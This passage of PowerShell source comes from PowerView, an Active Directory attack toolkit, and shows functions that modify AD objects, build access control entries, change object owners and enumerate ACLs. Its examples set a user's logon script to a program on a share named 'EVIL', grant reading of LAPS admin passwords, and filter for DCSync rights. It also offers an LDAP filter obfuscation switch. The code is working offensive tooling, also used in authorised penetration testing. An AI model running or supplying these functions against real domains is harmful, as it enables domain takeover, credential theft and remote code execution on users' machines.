@{'scriptpath'='\\\\EVIL\\program2.exe'} -Credential $Cred -Verbose\nVERBOSE: [Get-Domain] Using alternate credentials for Get-Domain\nVERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential\nVERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\nVERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection\nVERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))\nVERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\\\EVIL\\program2.exe' for object 'testuser'\n\nGet-DomainUser -Identity testuser -Properties scriptpath\n\nscriptpath\n----------\n\\\\EVIL\\program2.exe\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Replace')]\n        [Hashtable]\n        $Set,\n\n        [ValidateNotNullOrEmpty()]\n        [Hashtable]\n        $XOR,\n\n        [ValidateNotNullOrEmpty()]\n        [String[]]\n        $Clear,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{'Raw' = $True}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n    }\n\n    PROCESS {\n        if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }\n\n        # splat the appropriate arguments to Get-DomainObject\n        $RawObject = Get-DomainObject @SearcherArguments\n\n        ForEach ($Object in $RawObject) {\n\n            $Entry = $RawObject.GetDirectoryEntry()\n\n            if($PSBoundParameters['Set']) {\n                try {\n                    $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object {\n                        Write-Verbose \"[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'\"\n                        $Entry.put($_.Name, $_.Value)\n                    }\n                    $Entry.commitchanges()\n                }\n                catch {\n                    Write-Warning \"[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_\"\n                }\n            }\n            if($PSBoundParameters['XOR']) {\n                try {\n                    $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object {\n                        $PropertyName = $_.Name\n                        $PropertyXorValue = $_.Value\n                        Write-Verbose \"[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'\"\n                        $TypeName = $Entry.$PropertyName[0].GetType().name\n\n                        # UAC value references- https://support.microsoft.com/en-us/kb/305144\n                        $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue\n                        $Entry.$PropertyName = $PropertyValue -as $TypeName\n                    }\n                    $Entry.commitchanges()\n                }\n                catch {\n                    Write-Warning \"[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_\"\n                }\n            }\n            if($PSBoundParameters['Clear']) {\n                try {\n                    $PSBoundParameters['Clear'] | ForEach-Object {\n                        $PropertyName = $_\n                        Write-Verbose \"[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'\"\n                        $Entry.$PropertyName.clear()\n                    }\n                    $Entry.commitchanges()\n                }\n                catch {\n                    Write-Warning \"[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction ConvertFrom-LDAPLogonHours {\n<#\n.SYNOPSIS\n\nConverts the LDAP LogonHours array to a processible object.\n\nAuthor: Lee Christensen (@tifkin_)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None\n\n.DESCRIPTION\n\nConverts the LDAP LogonHours array to a processible object.  Each entry\nproperty in the output object corresponds to a day of the week and hour during\nthe day (in UTC) indicating whether or not the user can logon at the specified\nhour.\n\n.PARAMETER LogonHoursArray\n\n21-byte LDAP hours array.\n\n.EXAMPLE\n\n$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours\nConvertFrom-LDAPLogonHours $hours\n\nGets the logonhours array from the first AD user with logon restrictions.\n\n.OUTPUTS\n\nPowerView.LogonHours\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.LogonHours')]\n    [CmdletBinding()]\n    Param (\n        [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [ValidateNotNullOrEmpty()]\n        [byte[]]\n        $LogonHoursArray\n    )\n\n    Begin {\n        if($LogonHoursArray.Count -ne 21) {\n            throw \"LogonHoursArray is the incorrect length\"\n        }\n\n        function ConvertTo-LogonHoursArray {\n            Param (\n                [int[]]\n                $HoursArr\n            )\n\n            $LogonHours = New-Object bool[] 24\n            for($i=0; $i -lt 3; $i++) {\n                $Byte = $HoursArr[$i]\n                $Offset = $i * 8\n                $Str = [Convert]::ToString($Byte,2).PadLeft(8,'0')\n\n                $LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7])\n                $LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6])\n                $LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5])\n                $LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4])\n                $LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3])\n                $LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2])\n                $LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1])\n                $LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0])\n            }\n\n            $LogonHours\n        }\n    }\n\n    Process {\n        $Output = @{\n            Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2]\n            Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5]\n            Tuesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8]\n            Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11]\n            Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14]\n            Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17]\n            Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20]\n        }\n\n        $Output = New-Object PSObject -Property $Output\n        $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours')\n        $Output\n    }\n}\n\n\nfunction New-ADObjectAccessControlEntry {\n<#\n.SYNOPSIS\n\nCreates a new Active Directory object-specific access control entry.\n\nAuthor: Lee Christensen (@tifkin_)  \nLicense: BSD 3-Clause  \nRequired Dependencies: None\n\n.DESCRIPTION\n\nCreates a new object-specific access control entry (ACE).  The ACE could be \nused for auditing access to an object or controlling access to objects.\n\n.PARAMETER PrincipalIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nfor the domain principal to add for the ACL. Required. Wildcards accepted.\n\n.PARAMETER PrincipalDomain\n\nSpecifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.\n\n.PARAMETER PrincipalSearchBase\n\nThe LDAP source to search through for principals, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER Right\n\nSpecifies the rights set on the Active Directory object.\n\n.PARAMETER AccessControlType\n\nSpecifies the type of ACE (allow or deny)\n\n.PARAMETER AuditFlag\n\nFor audit ACEs, specifies when to create an audit log (on success or failure)\n\n.PARAMETER ObjectType\n\nSpecifies the GUID of the object that the ACE applies to.\n\n.PARAMETER InheritanceType\n\nSpecifies how the ACE applies to the object and/or its children.\n\n.PARAMETER InheritedObjectType\n\nSpecifies the type of object that can inherit the ACE.\n\n.EXAMPLE\n\n$Guids = Get-DomainGUIDMap\n$AdmPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'ms-Mcs-AdmPwd'} | select -ExpandProperty name\n$CompPropertyGuid = $Guids.GetEnumerator() | ?{$_.value -eq 'Computer'} | select -ExpandProperty name\n$ACE = New-ADObjectAccessControlEntry -Verbose -PrincipalIdentity itadmin -Right ExtendedRight,ReadProperty -AccessControlType Allow -ObjectType $AdmPropertyGuid -InheritanceType All -InheritedObjectType $CompPropertyGuid\n$OU = Get-DomainOU -Raw Workstations\n$DsEntry = $OU.GetDirectoryEntry()\n$dsEntry.PsBase.Options.SecurityMasks = 'Dacl'\n$dsEntry.PsBase.ObjectSecurity.AddAccessRule($ACE)\n$dsEntry.PsBase.CommitChanges()\n\nAdds an ACE to all computer objects in the OU \"Workstations\" permitting the\nuser \"itadmin\" to read the confidential ms-Mcs-AdmPwd computer property.\n\n.OUTPUTS\n\nSystem.Security.AccessControl.AuthorizationRule\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('System.Security.AccessControl.AuthorizationRule')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True, Mandatory = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String]\n        $PrincipalIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $PrincipalDomain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateSet('AccessSystemSecurity', 'CreateChild','Delete','DeleteChild','DeleteTree','ExtendedRight','GenericAll','GenericExecute','GenericRead','GenericWrite','ListChildren','ListObject','ReadControl','ReadProperty','Self','Synchronize','WriteDacl','WriteOwner','WriteProperty')]\n        $Right,\n\n        [Parameter(Mandatory = $True, ParameterSetName='AccessRuleType')]\n        [ValidateSet('Allow', 'Deny')]\n        [String[]]\n        $AccessControlType,\n\n        [Parameter(Mandatory = $True, ParameterSetName='AuditRuleType')]\n        [ValidateSet('Success', 'Failure')]\n        [String]\n        $AuditFlag,\n\n        [Parameter(Mandatory = $False, ParameterSetName='AccessRuleType')]\n        [Parameter(Mandatory = $False, ParameterSetName='AuditRuleType')]\n        [Parameter(Mandatory = $False, ParameterSetName='ObjectGuidLookup')]\n        [Guid]\n        $ObjectType,\n\n        [ValidateSet('All', 'Children','Descendents','None','SelfAndChildren')]\n        [String]\n        $InheritanceType,\n\n        [Guid]\n        $InheritedObjectType\n    )\n\n    Begin {\n        if ($PrincipalIdentity -notmatch '^S-1-.*') {\n            $PrincipalSearcherArguments = @{\n                'Identity' = $PrincipalIdentity\n                'Properties' = 'distinguishedname,objectsid'\n            }\n            if ($PSBoundParameters['PrincipalDomain']) { $PrincipalSearcherArguments['Domain'] = $PrincipalDomain }\n            if ($PSBoundParameters['Server']) { $PrincipalSearcherArguments['Server'] = $Server }\n            if ($PSBoundParameters['SearchScope']) { $PrincipalSearcherArguments['SearchScope'] = $SearchScope }\n            if ($PSBoundParameters['ResultPageSize']) { $PrincipalSearcherArguments['ResultPageSize'] = $ResultPageSize }\n            if ($PSBoundParameters['ServerTimeLimit']) { $PrincipalSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n            if ($PSBoundParameters['Tombstone']) { $PrincipalSearcherArguments['Tombstone'] = $Tombstone }\n            if ($PSBoundParameters['Credential']) { $PrincipalSearcherArguments['Credential'] = $Credential }\n            $Principal = Get-DomainObject @PrincipalSearcherArguments\n            if (-not $Principal) {\n                throw \"Unable to resolve principal: $PrincipalIdentity\"\n            }\n            elseif($Principal.Count -gt 1) {\n                throw \"PrincipalIdentity matches multiple AD objects, but only one is allowed\"\n            }\n            $ObjectSid = $Principal.objectsid\n        }\n        else {\n            $ObjectSid = $PrincipalIdentity\n        }\n\n        $ADRight = 0\n        foreach($r in $Right) {\n            $ADRight = $ADRight -bor (([System.DirectoryServices.ActiveDirectoryRights]$r).value__)\n        }\n        $ADRight = [System.DirectoryServices.ActiveDirectoryRights]$ADRight\n\n        $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ObjectSid)\n    }\n\n    Process {\n        if($PSCmdlet.ParameterSetName -eq 'AuditRuleType') {\n\n            if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag\n            } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)\n            } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType\n            } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType\n            } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType\n            } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAuditRule -ArgumentList $Identity, $ADRight, $AuditFlag, $ObjectType, $InheritanceType, $InheritedObjectType\n            }\n\n        }\n        else {\n\n            if($ObjectType -eq $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType\n            } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType)\n            } elseif($ObjectType -eq $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, ([System.DirectoryServices.ActiveDirectorySecurityInheritance]$InheritanceType), $InheritedObjectType\n            } elseif($ObjectType -ne $null -and $InheritanceType -eq [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType\n            } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -eq $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType\n            } elseif($ObjectType -ne $null -and $InheritanceType -ne [String]::Empty -and $InheritedObjectType -ne $null) {\n                New-Object System.DirectoryServices.ActiveDirectoryAccessRule -ArgumentList $Identity, $ADRight, $AccessControlType, $ObjectType, $InheritanceType, $InheritedObjectType\n            }\n\n        }\n    }\n}\n\n\nfunction Set-DomainObjectOwner {\n<#\n.SYNOPSIS\n\nModifies the owner for a specified active directory object.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainObject  \n\n.DESCRIPTION\n\nRetrieves the Active Directory object specified by -Identity by splatting to\nGet-DomainObject, returning the raw searchresult object. Retrieves the raw\ndirectoryentry for the object, and sets the object owner to -OwnerIdentity.\n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nof the AD object to set the owner for.\n\n.PARAMETER OwnerIdentity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\nof the owner to set for -Identity.\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.EXAMPLE\n\nSet-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y\n\nSet the owner of 'dfm' in the current domain to 'harmj0y'.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nSet-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred\n\nSet the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [CmdletBinding()]\n    Param(\n        [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String]\n        $Identity,\n\n        [Parameter(Mandatory = $True)]\n        [ValidateNotNullOrEmpty()]\n        [Alias('Owner')]\n        [String]\n        $OwnerIdentity,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty\n    )\n\n    BEGIN {\n        $SearcherArguments = @{}\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }\n        if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }\n        if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }\n        if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }\n        if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }\n        if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }\n\n        $OwnerSid = Get-DomainObject @SearcherArguments -Identity $OwnerIdentity -Properties objectsid | Select-Object -ExpandProperty objectsid\n        if ($OwnerSid) {\n            $OwnerIdentityReference = [System.Security.Principal.SecurityIdentifier]$OwnerSid\n        }\n        else {\n            Write-Warning \"[Set-DomainObjectOwner] Error parsing owner identity '$OwnerIdentity'\"\n        }\n    }\n\n    PROCESS {\n        if ($OwnerIdentityReference) {\n            $SearcherArguments['Raw'] = $True\n            $SearcherArguments['Identity'] = $Identity\n\n            # splat the appropriate arguments to Get-DomainObject\n            $RawObject = Get-DomainObject @SearcherArguments\n\n            ForEach ($Object in $RawObject) {\n                try {\n                    Write-Verbose \"[Set-DomainObjectOwner] Attempting to set the owner for '$Identity' to '$OwnerIdentity'\"\n                    $Entry = $RawObject.GetDirectoryEntry()\n                    $Entry.PsBase.Options.SecurityMasks = 'Owner'\n                    $Entry.PsBase.ObjectSecurity.SetOwner($OwnerIdentityReference)\n                    $Entry.PsBase.CommitChanges()\n                }\n                catch {\n                    Write-Warning \"[Set-DomainObjectOwner] Error setting owner: $_\"\n                }\n            }\n        }\n    }\n}\n\n\nfunction Get-DomainObjectAcl {\n<#\n.SYNOPSIS\n\nReturns the ACLs associated with a specific active directory object. By default\nthe DACL for the object(s) is returned, but the SACL can be returned with -Sacl.\n\nAuthor: Will Schroeder (@harmj0y)  \nLicense: BSD 3-Clause  \nRequired Dependencies: Get-DomainSearcher, Get-DomainGUIDMap  \n\n.PARAMETER Identity\n\nA SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),\nSID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).\nWildcards accepted.\n\n.PARAMETER Sacl\n\nSwitch. Return the SACL instead of the DACL for the object (default behavior).\n\n.PARAMETER Owner\n\nSwitch. Return the Owner instead of the DACL for the object (default behavior).\n\n.PARAMETER ResolveGUIDs\n\nSwitch. Resolve GUIDs to their display names.\n\n.PARAMETER RightsFilter\n\nA specific set of rights to return ('All', 'ResetPassword', 'WriteMembers').\n\n.PARAMETER Domain\n\nSpecifies the domain to use for the query, defaults to the current domain.\n\n.PARAMETER LDAPFilter\n\nSpecifies an LDAP query string that is used to filter Active Directory objects.\n\n.PARAMETER SearchBase\n\nThe LDAP source to search through, e.g. \"LDAP://OU=secret,DC=testlab,DC=local\"\nUseful for OU queries.\n\n.PARAMETER Server\n\nSpecifies an Active Directory server (domain controller) to bind to.\n\n.PARAMETER SearchScope\n\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\n\n.PARAMETER ResultPageSize\n\nSpecifies the PageSize to set for the LDAP searcher object.\n\n.PARAMETER ServerTimeLimit\n\nSpecifies the maximum amount of time the server spends searching. Default of 120 seconds.\n\n.PARAMETER Tombstone\n\nSwitch. Specifies that the searcher should also return deleted/tombstoned objects.\n\n.PARAMETER Credential\n\nA [Management.Automation.PSCredential] object of alternate credentials\nfor connection to the target domain.\n\n.PARAMETER SSL\n\nSwitch. Use SSL for the connection to the LDAP server.\n\n.PARAMETER Obfuscate\n\nSwitch. Obfuscate the resulting LDAP filter string using hex encoding.\n\n.EXAMPLE\n\nGet-DomainObjectAcl -Identity matt.admin -domain testlab.local -ResolveGUIDs\n\nGet the ACLs for the matt.admin user in the testlab.local domain and\nresolve relevant GUIDs to their display names.\n\n.EXAMPLE\n\nGet-DomainOU | Get-DomainObjectAcl -ResolveGUIDs\n\nEnumerate the ACL permissions for all OUs in the domain.\n\n.EXAMPLE\n\nGet-DomainOU | Get-DomainObjectAcl -ResolveGUIDs -Sacl\n\nEnumerate the SACLs for all OUs in the domain, resolving GUIDs.\n\n.EXAMPLE\n\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\nGet-DomainObjectAcl -Credential $Cred -ResolveGUIDs\n\n.OUTPUTS\n\nPowerView.ACL\n\nCustom PSObject with ACL entries.\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [OutputType('PowerView.ACL')]\n    [CmdletBinding()]\n    Param (\n        [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]\n        [Alias('DistinguishedName', 'SamAccountName', 'Name')]\n        [String[]]\n        $Identity,\n\n        [Switch]\n        $Sacl,\n\n        [Switch]\n        $Owner,\n\n        [Switch]\n        $ResolveGUIDs,\n\n        [String]\n        [Alias('Rights')]\n        [ValidateSet('All', 'ResetPassword', 'WriteMembers', 'DCSync', 'AllExtended', 'ReadLAPS')]\n        $RightsFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [String]\n        $Domain,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('Filter')]\n        [String]\n        $LDAPFilter,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('ADSPath')]\n        [String]\n        $SearchBase,\n\n        [ValidateNotNullOrEmpty()]\n        [Alias('DomainController')]\n        [String]\n        $Server,\n\n        [ValidateSet('Base', 'OneLevel', 'Subtree')]\n        [String]\n        $SearchScope = 'Subtree',\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ResultPageSize = 200,\n\n        [ValidateRange(1, 10000)]\n        [Int]\n        $ServerTimeLimit,\n\n        [Switch]\n        $Tombstone,\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Switch]\n        $SSL,\n\n        [Switch]\n        $Obfuscate\n    )\n\n    BEGIN {\n        $SearcherArguments = @{\n            'Properties' = 'samaccountname,ntsecuritydescriptor,distinguishedname,objectsid'\n        }\n\n        if ($PSBoundParameters['Sacl']) {\n            $SearcherArguments['SecurityMasks'] = 'Sacl'\n        }\n        elseif ($PSBoundParameters['Owner']) {\n            $SearcherArguments['SecurityMasks'] = 'Owner'\n        }\n        else {\n            $SearcherArguments['SecurityMasks'] = 'Dacl'\n        }\n        if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }\n        if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }\n        if 